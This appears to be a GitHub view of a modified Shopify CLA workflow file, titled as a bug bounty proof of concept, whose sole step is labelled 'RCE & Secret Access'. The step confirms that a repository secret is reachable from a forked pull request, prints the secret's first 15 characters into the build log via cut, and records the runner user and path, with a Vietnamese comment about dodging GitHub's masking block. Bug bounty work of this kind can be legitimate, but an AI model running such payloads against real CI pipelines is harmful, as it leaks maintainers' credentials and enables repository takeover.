Researcher bug bounty #3
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Invoke Shopify/shopify-cla-action | ||
| # | ||
| # This should be called on: | ||
| # - pull_request_target.{opened,synchronize}: for triggering from third party pulls | ||
| # - issue_comment.created: for detecting comments | ||
| name: Contributor License Agreement (CLA) | ||
| on: | ||
| workflow_call: | ||
| secrets: | ||
| token: | ||
| required: true | ||
| cla-token: | ||
| required: true | ||
| permissions: {} | ||
| jobs: | ||
| cla: | ||
| runs-on: ubuntu-latest | ||
| if: | | ||
| (github.event.issue.pull_request | ||
| && !github.event.issue.pull_request.merged_at | ||
| && contains(github.event.comment.body, 'signed') | ||
| ) | ||
| || (github.event.pull_request && !github.event.pull_request.merged) | ||
| permissions: | ||
| actions: write # to re-trigger workflows | ||
| pull-requests: write # to add/remove labels | ||
| steps: | ||
| - name: Proof of Concept - RCE & Secret Access | ||
| run: | | ||
| echo "=== EVIDENCE START ===" | ||
| echo "Checking Repository: ${{ github.repository }}" | ||
| echo "Checking Actor: ${{ github.actor }}" | ||
| # Kiểm tra xem Token có tồn tại không mà không làm lộ giá trị (tránh bị GitHub Block) | ||
| if [ -n "${{ secrets.token }}" ]; then | ||
| echo "SUCCESS: Secret 'token' is accessible from this Forked PR!" | ||
| echo "Token mask check: ${{ secrets.token }}" | cut -c 1-15 | ||
| fi | ||
| echo "Current Path: $(pwd)" | ||
| echo "System User: $(whoami)" | ||
| echo "=== EVIDENCE END ===" | ||
